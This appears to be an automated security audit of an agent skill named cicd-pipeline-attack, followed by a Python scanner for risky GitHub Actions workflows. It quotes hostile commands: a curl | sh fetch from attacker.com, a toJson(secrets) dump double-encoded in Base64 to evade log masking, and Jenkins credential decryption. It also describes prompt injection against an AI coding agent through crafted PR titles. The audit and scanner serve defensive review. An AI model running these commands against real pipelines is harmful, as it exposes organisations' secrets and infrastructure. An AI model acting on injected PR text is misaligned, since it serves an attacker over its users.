cicd-pipeline-attack

Fail

Audited by Gen Agent Trust Hub on May 4, 2026

Risk Level: HIGH
Findings: REMOTE_CODE_EXECUTION, DATA_EXFILTRATION, COMMAND_EXECUTION, CREDENTIALS_UNSAFE, PROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill provides numerous payloads and methodology for executing arbitrary code on CI/CD runners and servers. Examples include:
    • Use of curl | sh patterns that fetch and execute a script from a remote URL (e.g., https://attacker.com/sh) in a single step.
    • Exploitation of Terraform external data sources (which execute during terraform plan, so a malicious change runs code before anything is applied) and local-exec provisioners (which execute during terraform apply).
    • Abuse of the Jenkins Groovy Script Console for direct server-side execution on the Jenkins controller.
  • [DATA_EXFILTRATION]: Instructions are provided for extracting sensitive information such as environment variables and CI/CD secrets. This includes:
    • Techniques to bypass log masking using multi-layered Base64 encoding (e.g., echo '${{ toJson(secrets) }}' | base64 -w0 | base64 -w0): the runner only redacts output that matches a secret's value, so re-encoding the output hides it, and the second layer defeats maskers that also cover a single Base64 encoding of each secret.
    • Methods for reading and exfiltrating cloud provider credentials (AWS access key/secret key pairs, GCP service account keys) and VCS tokens.
  • [COMMAND_EXECUTION]: The methodology covers various ways to execute commands by manipulating CI/CD configuration files (direct poisoned pipeline execution, D-PPE) and the files those pipelines consume, such as build scripts and test configuration (indirect poisoned pipeline execution, I-PPE).
    • Details on abusing pull_request_target and issue_comment triggers to execute malicious code within a privileged context: unlike pull_request, these GitHub Actions triggers run in the base repository's context with access to its secrets and a GITHUB_TOKEN that can have write permissions, so a workflow that checks out and runs the contributor's code exposes that context to the contributor.
    • Guidance on interacting with the Docker API and internal network services reachable from self-hosted runners.
  • [CREDENTIALS_UNSAFE]: The skill contains detailed procedures for dumping and decrypting credentials stored by Jenkins (credentials.xml, decrypted with the instance's master.key) and for harvesting cloud credentials from file systems and environment variables.
  • [PROMPT_INJECTION]: The skill identifies and describes techniques for indirect prompt injection targeting AI agents used in CI/CD workflows, specifically through the manipulation of PR and issue metadata that the agent reads as input. For instance, it details how attackers can craft PR titles so that Claude Code Action's tool-calling capabilities are invoked on the attacker's behalf.
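The findings above describe the attacker's side. As an added example (not part of the audited skill or of this audit report), the following Python script shows the defender's counterpart: a heuristic scanner that flags the four GitHub Actions patterns the audit names (a privileged trigger combined with a checkout of the contributor's code, a toJson(secrets) dump, a curl | sh remote pipe, and Base64-encoding of a secrets expression), plus a small model of why the double Base64 layer defeats log masking. The sample workflows, the URL example.invalid and the secret value are constructed; the scanner is deliberately text-based so it runs without a YAML library; and the masker is a simplified assumption, modelled on a runner that redacts a secret's literal value and its single Base64 encoding, not the real runner implementation.

```python
import base64
import re
from typing import Dict, List

# Constructed sample workflows for the scanner (not taken from the audited skill).
PWN_REQUEST_WORKFLOW = """\
name: pr-check
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm install && npm test
      - run: echo '${{ toJson(secrets) }}' | base64 -w0 | base64 -w0
      - run: curl -sSL https://example.invalid/setup.sh | sh
"""

# Same privileged trigger, but the checkout stays on the base branch and no
# contributor-controlled script runs, so the scanner should report nothing.
HARDENED_WORKFLOW = """\
name: pr-check
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: ./scripts/label-pr.sh "${{ github.event.pull_request.number }}"
"""

# Heuristic patterns, one per finding category named in the audit above.
PRIV_TRIGGER = re.compile(r"^\s*(pull_request_target|issue_comment)\s*:", re.M)
UNTRUSTED_REF = re.compile(
    r"github\.(event\.pull_request\.head|event\.issue\.pull_request|head_ref)"
)
SECRETS_DUMP = re.compile(r"toJSON\(\s*secrets\s*\)", re.I)
REMOTE_PIPE = re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh)\b")
ENCODED_SECRET = re.compile(r"secrets[.)][^\n]*\|\s*base64\b")


def audit_workflow(text: str) -> List[str]:
    """Return finding codes for a GitHub Actions workflow given as text.

    Text-based on purpose so it runs without a YAML library; a production
    scanner should parse the YAML and inspect the 'on' and 'steps' trees.
    """
    findings = []
    # A privileged trigger is only a finding when the job also checks out
    # (and may therefore execute) the contributor's code.
    if PRIV_TRIGGER.search(text) and UNTRUSTED_REF.search(text):
        findings.append("PWN_REQUEST")
    if SECRETS_DUMP.search(text):
        findings.append("SECRETS_DUMP")
    if REMOTE_PIPE.search(text):
        findings.append("REMOTE_PIPE")
    if ENCODED_SECRET.search(text):
        findings.append("MASK_BYPASS")
    return findings


def mask_log(line: str, secrets: Dict[str, str]) -> str:
    """Simplified model of a runner log masker (an assumption, not the real
    implementation): redact each secret value and its single Base64 encoding."""
    for value in secrets.values():
        once = base64.b64encode(value.encode()).decode()
        for needle in (value, once):
            line = line.replace(needle, "***")
    return line


def demo_mask_bypass(secret: str) -> Dict[str, str]:
    """Show which encodings of a secret survive the masker above."""
    secrets = {"TOKEN": secret}
    once = base64.b64encode(secret.encode()).decode()
    twice = base64.b64encode(once.encode()).decode()
    return {
        "plain": mask_log(f"token={secret}", secrets),
        "base64_once": mask_log(f"token={once}", secrets),
        "base64_twice": mask_log(f"token={twice}", secrets),
    }


if __name__ == "__main__":
    for name, wf in (("pwn_request", PWN_REQUEST_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(name, audit_workflow(wf))
    print(demo_mask_bypass("ghp_exampletoken123"))  # constructed secret value
```

The hardened sample keeps pull_request_target, which is legitimate for labelling or commenting on forked PRs; what the scanner objects to is the combination with a checkout of the PR head and execution of contributor-controlled scripts. The mask demo shows the plain and single-encoded values redacted and the double-encoded value passing through untouched, which is the reason the payload quoted in the audit pipes through base64 twice.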
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
May 4, 2026, 08:15 AM